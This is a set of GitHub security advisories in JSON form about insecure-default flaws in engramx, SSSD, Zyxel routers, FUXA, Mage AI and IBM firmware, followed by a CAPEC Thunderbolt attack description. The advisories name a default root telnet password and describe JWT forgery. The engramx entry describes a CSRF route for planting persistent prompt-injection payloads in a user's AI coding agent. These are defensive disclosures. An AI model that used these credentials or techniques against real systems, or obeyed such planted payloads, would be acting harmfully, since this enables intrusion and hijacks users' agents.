{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "engramx"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.0.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-1188",
"CWE-306",
"CWE-352",
"CWE-942"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-22T14:52:03Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nThe local HTTP server started by `engram server` (binding `127.0.0.1:7337` by default) was exposed to any browser origin with no authentication unless `ENGRAM_API_TOKEN` was explicitly set. Combined with `Access-Control-Allow-Origin: *` on every response and a body parser that did not require `Content-Type: application/json`, this allowed a malicious web page the developer visited to:\n\n1. **Exfiltrate** the local knowledge graph via `GET /query` and `GET /stats` (function names, file layout, recorded decisions/mistakes).\n2. **Inject persistent prompt-injection payloads** via `POST /learn`, which wrote `mistake`/`decision` nodes that were later surfaced as system-reminders to the user\u0027s AI coding agent on every future session and file edit.\n\nSeverity: **High** \u2014 confidentiality + persistent indirect prompt injection against the user\u0027s coding agent.\n\n### Affected versions\n\n`engramx` \u003e= 1.0.0, \u003c 2.0.2 \u2014 any version that shipped the HTTP server.\n\n### Patched in\n\n`engramx@2.0.2`\n\n### Workarounds (if you cannot upgrade)\n\n- Do **not** run `engram server` or `engram ui`.\n- If developers must, set `ENGRAM_API_TOKEN` to a long random value and terminate the server before browsing the web.\n\n### Remediation (applied in 2.0.2)\n\n1. Fail-closed auth on every non-public route \u2014 Bearer header or HttpOnly cookie, constant-time comparison, 256-bit auto-generated token at `~/.engram/http-server.token` (0600).\n2. Wildcard CORS removed entirely; default is no CORS headers. Opt-in allowlist via `ENGRAM_ALLOWED_ORIGINS`.\n3. Host + Origin validation \u2014 rejects DNS rebinding and Host spoofing.\n4. `Content-Type: application/json` enforced on mutations \u2014 blocks the text/plain CSRF vector.\n5. `/ui?token=` bootstrap with `Sec-Fetch-Site` gate \u2014 prevents cross-origin oracle probing.\n\n### Credit\n\nDiscovered and responsibly disclosed by @gabiudrescu in engram issue #7.",
"id": "GHSA-2r2p-4cgf-hv7h",
"modified": "2026-04-22T14:52:03Z",
"published": "2026-04-22T14:52:03Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/NickCirv/engram/security/advisories/GHSA-2r2p-4cgf-hv7h"
},
{
"type": "WEB",
"url": "https://github.com/NickCirv/engram/issues/7"
},
{
"type": "PACKAGE",
"url": "https://github.com/NickCirv/engram"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "engram: HTTP server CORS wildcard + auth-off-by-default enables CSRF graph exfiltration and persistent indirect prompt injection"
}
GHSA-2VQ9-J58H-2QJ3
Vulnerability from github – Published: 2026-07-07 12:31 – Updated: 2026-07-07 12:31A flaw was found in SSSD's LDAP sudo provider. When the ldap_sudo_search_base option is not explicitly configured, SSSD searches the entire LDAP directory tree for sudoRole objects. An authenticated attacker with write access to any subtree can inject a sudoRole object granting root-level sudo privileges on all SSSD-enrolled hosts.
{
"affected": [],
"aliases": [
"CVE-2026-14474"
],
"database_specific": {
"cwe_ids": [
"CWE-1188"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-07T10:16:39Z",
"severity": "HIGH"
},
"details": "A flaw was found in SSSD\u0027s LDAP sudo provider. When the ldap_sudo_search_base option is not explicitly configured, SSSD searches the entire LDAP directory tree for sudoRole objects. An authenticated attacker with write access to any subtree can inject a sudoRole object granting root-level sudo privileges on all SSSD-enrolled hosts.",
"id": "GHSA-2vq9-j58h-2qj3",
"modified": "2026-07-07T12:31:35Z",
"published": "2026-07-07T12:31:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14474"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2026-14474"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496556"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-2WC3-9W3J-8PHW
Vulnerability from github – Published: 2022-05-13 01:47 – Updated: 2022-05-13 01:47Zyxel WRE6505 devices have a default TELNET password of 1234 for the root and admin accounts, which makes it easier for remote attackers to conduct DNS hijacking attacks by reconfiguring the built-in dnshijacker process.
{
"affected": [],
"aliases": [
"CVE-2017-7964"
],
"database_specific": {
"cwe_ids": [
"CWE-1188"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-04-19T16:59:00Z",
"severity": "CRITICAL"
},
"details": "Zyxel WRE6505 devices have a default TELNET password of 1234 for the root and admin accounts, which makes it easier for remote attackers to conduct DNS hijacking attacks by reconfiguring the built-in dnshijacker process.",
"id": "GHSA-2wc3-9w3j-8phw",
"modified": "2022-05-13T01:47:14Z",
"published": "2022-05-13T01:47:14Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7964"
},
{
"type": "WEB",
"url": "https://www.oxy-gen.mobi/blog.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-32CC-X95P-FXCG
Vulnerability from github – Published: 2026-02-05 00:36 – Updated: 2026-02-10 02:56Description
An insecure default configuration in FUXA allows an unauthenticated, remote attacker to gain administrative access and execute arbitrary code on the server. This affects FUXA through version 1.2.9 when authentication is enabled, but the administrator JWT secret is not configured. This issue has been patched in FUXA version 1.2.10.
Impact
The FUXA documentation allows administrators to manually update a hardcoded JWT secret when enabling authentication. This feature was not available in the UI. This results in a fail-open security posture, where the application can report or appear to be operating in secureEnabled mode while still accepting tokens signed with a publicly known key.
Exploitation allows an unauthenticated, remote attacker to forge JWTs to bypass all authentication mechanisms and obtain administrative access to the FUXA instance. With these elevated privileges, the attacker can interact with administrative APIs, including intended features designed for automation and scripting, to execute arbitrary code in the context of the FUXA service. Depending on deployment configuration and permissions, this may lead to full system compromise and could further expose connected ICS/SCADA environments to follow-on actions.
Patches
This issue has been patched in FUXA version 1.2.10. Users are strongly encouraged to update to the latest available release.
Notes
GitHub stated this vulnerability is identical to CVE-2025-69971, which was published against the repository out of band before coordinated disclosure concluded. CVE-2025-69971 is directionally correct, but the description is inaccurate. Please refer to this advisory for the proper description and affected versions.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.2.9"
},
"package": {
"ecosystem": "npm",
"name": "fuxa-server"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.2.10"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-25894"
],
"database_specific": {
"cwe_ids": [
"CWE-1188",
"CWE-321"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-05T00:36:30Z",
"nvd_published_at": "2026-02-09T23:16:05Z",
"severity": "CRITICAL"
},
"details": "### Description\nAn insecure default configuration in FUXA allows an unauthenticated, remote attacker to gain administrative access and execute arbitrary code on the server. This affects FUXA through version 1.2.9 when authentication is enabled, but the administrator JWT secret is not configured. This issue has been patched in FUXA version 1.2.10.\n\n### Impact\nThe FUXA documentation allows administrators to manually update a hardcoded JWT secret when enabling authentication. This feature was not available in the UI. This results in a fail-open security posture, where the application can report or appear to be operating in `secureEnabled` mode while still accepting tokens signed with a publicly known key.\n\nExploitation allows an unauthenticated, remote attacker to forge JWTs to bypass all authentication mechanisms and obtain administrative access to the FUXA instance. With these elevated privileges, the attacker can interact with administrative APIs, including intended features designed for automation and scripting, to execute arbitrary code in the context of the FUXA service. Depending on deployment configuration and permissions, this may lead to full system compromise and could further expose connected ICS/SCADA environments to follow-on actions.\n\n### Patches\nThis issue has been patched in FUXA version 1.2.10. Users are strongly encouraged to update to the latest available release.\n\n### Notes\nGitHub stated this vulnerability is identical to CVE-2025-69971, which was published against the repository out of band before coordinated disclosure concluded. CVE-2025-69971 is directionally correct, but the description is inaccurate. Please refer to this advisory for the proper description and affected versions.",
"id": "GHSA-32cc-x95p-fxcg",
"modified": "2026-02-10T02:56:48Z",
"published": "2026-02-05T00:36:30Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/frangoteam/FUXA/security/advisories/GHSA-32cc-x95p-fxcg"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25894"
},
{
"type": "WEB",
"url": "https://github.com/frangoteam/FUXA/commit/ea7b3df066f9fdef8ecdce318398ae40546bc50d"
},
{
"type": "PACKAGE",
"url": "https://github.com/frangoteam/FUXA"
},
{
"type": "WEB",
"url": "https://github.com/frangoteam/FUXA/releases/tag/v1.2.10"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "FUXA Unauthenticated Remote Code Execution via Hardcoded JWT Secret in Default Configuration"
}
GHSA-32CP-9H8G-XVHR
Vulnerability from github – Published: 2025-03-09 21:30 – Updated: 2025-03-09 21:30A vulnerability was found in Mage AI 0.9.75. It has been classified as problematic. This affects an unknown part. The manipulation leads to insecure default initialization of resource. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. After 7 months of repeated follow-ups by the researcher, Mage AI has decided to not accept this issue as a valid security vulnerability and has confirmed that they will not be addressing it.
{
"affected": [],
"aliases": [
"CVE-2025-2129"
],
"database_specific": {
"cwe_ids": [
"CWE-1188"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-03-09T20:15:27Z",
"severity": "MODERATE"
},
"details": "A vulnerability was found in Mage AI 0.9.75. It has been classified as problematic. This affects an unknown part. The manipulation leads to insecure default initialization of resource. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. After 7 months of repeated follow-ups by the researcher, Mage AI has decided to not accept this issue as a valid security vulnerability and has confirmed that they will not be addressing it.",
"id": "GHSA-32cp-9h8g-xvhr",
"modified": "2025-03-09T21:30:53Z",
"published": "2025-03-09T21:30:53Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-2129"
},
{
"type": "WEB",
"url": "https://github.com/zn9988/publications/blob/main/2.Mage-AI%20-%20Insecure%20Default%20Authentication%20Setup%20Leading%20to%20Zero-Click%20RCE/README.md"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.299049"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.299049"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.510690"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-3633-JV58-FG5J
Vulnerability from github – Published: 2022-05-24 16:54 – Updated: 2022-12-09 21:30IBM Open Power Firmware OP910 and OP920 could allow access to BMC via IPMI using default OpenBMC password even after BMC password was changed away from the default password. IBM X-Force ID: 158702.
{
"affected": [],
"aliases": [
"CVE-2019-4169"
],
"database_specific": {
"cwe_ids": [
"CWE-1188"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-08-26T15:15:00Z",
"severity": "CRITICAL"
},
"details": "IBM Open Power Firmware OP910 and OP920 could allow access to BMC via IPMI using default OpenBMC password even after BMC password was changed away from the default password. IBM X-Force ID: 158702.",
"id": "GHSA-3633-jv58-fg5j",
"modified": "2022-12-09T21:30:48Z",
"published": "2022-05-24T16:54:48Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-4169"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/158702"
},
{
"type": "WEB",
"url": "http://www.ibm.com/support/docview.wss?uid=ibm10881209"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
No mitigation information available for this CWE.
CAPEC-665: Exploitation of Thunderbolt Protection Flaws
An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.